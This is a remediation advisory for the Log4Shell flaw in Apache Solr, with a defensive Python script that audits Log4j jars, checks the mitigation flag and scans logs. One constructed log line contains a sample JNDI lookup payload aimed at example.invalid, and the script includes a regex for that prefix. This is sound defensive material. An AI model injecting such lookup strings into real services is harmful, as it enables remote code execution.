Apache Solr Log4Shell RCE
Description
Apache Solr versions that bundle a vulnerable Log4j library (CVE-2021-44228, also known as Log4Shell) allow remote code execution through specially crafted input. An attacker can exploit this critical vulnerability by injecting malicious JNDI lookup strings that cause the application to execute arbitrary code or exfiltrate sensitive data, and no authentication is required.
Remediation
Take the following steps immediately to remediate this vulnerability:
1. Upgrade Apache Solr to version 8.11.1 or later (for the 8.x branch) or 7.7.3 or later (for the 7.x branch); both ship a patched Log4j version
2. If immediate upgrade is not possible, apply one of these temporary mitigations:
- Set the JVM option -Dlog4j2.formatMsgNoLookups=true
- Remove the JndiLookup class from the Log4j JAR file:
zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
3. Verify the fix by checking the Solr and Log4j versions after applying the updates
4. Review logs for suspicious activity or exploitation attempts that occurred before patching
5. Implement network segmentation to limit exposure of Solr instances to untrusted networks
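The following script is an added example for steps 2 through 4 above; it is not part of the Solr advisory or the Solr project. It walks an install tree for log4j-core jars, reports each jar's version and whether the JndiLookup class is still inside it (so a jar that was cleaned with the zip -d mitigation shows as mitigated rather than vulnerable), checks whether SOLR_OPTS carries the formatMsgNoLookups flag, and scans log lines for the JNDI lookup prefix. Assumptions: jars are named log4j-core-<version>.jar as Solr places them under server/lib/ext, Log4j versions below 2.15.0 are treated as vulnerable, and the sample jars, versions and log lines are constructed fixtures built in a temporary directory.

```python
"""Post-remediation checks for Log4Shell in a Solr install (added example).

Assumptions (not from the advisory): log4j-core jars are named
log4j-core-<major>.<minor>.<patch>.jar; versions below FIXED_LOG4J are
vulnerable; all fixtures below are constructed for demonstration.
"""
import os
import re
import tempfile
import zipfile
from typing import Dict, List, Optional, Tuple

JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
FIXED_LOG4J = (2, 15, 0)  # assumption: first Log4j 2.x line treated as fixed
JAR_NAME_RE = re.compile(r"^log4j-core-(\d+)\.(\d+)\.(\d+)\.jar$")
NOLOOKUPS_FLAG = "-Dlog4j2.formatMsgNoLookups=true"
# Defensive detection: the literal lookup prefix seen in exploitation attempts.
JNDI_PATTERN = re.compile(r"\$\{jndi:", re.IGNORECASE)

# Constructed Solr request-log lines; line 2 carries a lookup string.
SAMPLE_LOG = [
    "2021-12-10 12:00:01.123 INFO  (qtp-1) [   ] o.a.s.c.S.Request [core1] "
    "webapp=/solr path=/select params={q=*:*} status=0 QTime=2",
    "2021-12-10 12:00:05.456 INFO  (qtp-2) [   ] o.a.s.c.S.Request [core1] "
    "webapp=/solr path=/select params={q=${jndi:ldap://example.invalid/x}} status=0 QTime=3",
    "2021-12-10 12:00:09.789 INFO  (qtp-3) [   ] o.a.s.c.S.Request [core1] "
    "webapp=/solr path=/admin/ping status=0 QTime=1",
]


def parse_log4j_version(jar_name: str) -> Optional[Tuple[int, int, int]]:
    """Extract (major, minor, patch) from a log4j-core jar file name."""
    m = JAR_NAME_RE.match(os.path.basename(jar_name))
    return tuple(int(x) for x in m.groups()) if m else None


def assess_jar(jar_path: str) -> Dict[str, object]:
    """Classify a jar as patched, mitigated (JndiLookup removed) or vulnerable."""
    version = parse_log4j_version(jar_path)
    with zipfile.ZipFile(jar_path) as zf:
        has_lookup = JNDI_LOOKUP_CLASS in zf.namelist()
    if version is not None and version >= FIXED_LOG4J:
        status = "patched"
    elif not has_lookup:
        status = "mitigated"  # old version, but the class was stripped (step 2)
    else:
        status = "vulnerable"
    return {"jar": jar_path, "version": version,
            "jndi_lookup_present": has_lookup, "status": status}


def find_log4j_core_jars(root: str) -> List[str]:
    """Recursively collect every log4j-core jar below root."""
    return sorted(os.path.join(d, f) for d, _, files in os.walk(root)
                  for f in files if JAR_NAME_RE.match(f))


def jvm_opts_have_nolookups(solr_opts: str) -> bool:
    """True if the step-2 JVM flag is present as a whole token in SOLR_OPTS."""
    return NOLOOKUPS_FLAG in solr_opts.split()


def scan_log_lines(lines) -> List[Tuple[int, str]]:
    """Return (line number, line) for every line containing a JNDI lookup prefix."""
    return [(i, ln.rstrip("\n")) for i, ln in enumerate(lines, 1)
            if JNDI_PATTERN.search(ln)]


def build_sample_jar(path: str, include_lookup: bool) -> str:
    """Constructed fixture: a minimal jar, optionally containing JndiLookup.class."""
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with zipfile.ZipFile(path, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        if include_lookup:
            zf.writestr(JNDI_LOOKUP_CLASS, b"\x00")  # placeholder bytes, not bytecode
    return path


def demo_assessment() -> Dict[str, str]:
    """Build three constructed installs and return {install name: status}."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_jar(os.path.join(tmp, "unpatched", "log4j-core-2.14.1.jar"), True)
        build_sample_jar(os.path.join(tmp, "mitigated", "log4j-core-2.14.1.jar"), False)
        build_sample_jar(os.path.join(tmp, "upgraded", "log4j-core-2.17.1.jar"), False)
        return {os.path.basename(os.path.dirname(j)): str(assess_jar(j)["status"])
                for j in find_log4j_core_jars(tmp)}


if __name__ == "__main__":
    for name, status in demo_assessment().items():
        print(f"{name}: {status}")
    print("formatMsgNoLookups set:", jvm_opts_have_nolookups("-Xmx2g " + NOLOOKUPS_FLAG))
    for lineno, line in scan_log_lines(SAMPLE_LOG):
        print(f"possible exploitation attempt, log line {lineno}: {line}")
```

Point find_log4j_core_jars at the Solr install root (the directory holding server/lib/ext) and feed scan_log_lines an open solr.log; the version check is decided by the jar name only, so the JndiLookup presence check is the one that actually confirms the zip -d mitigation took effect.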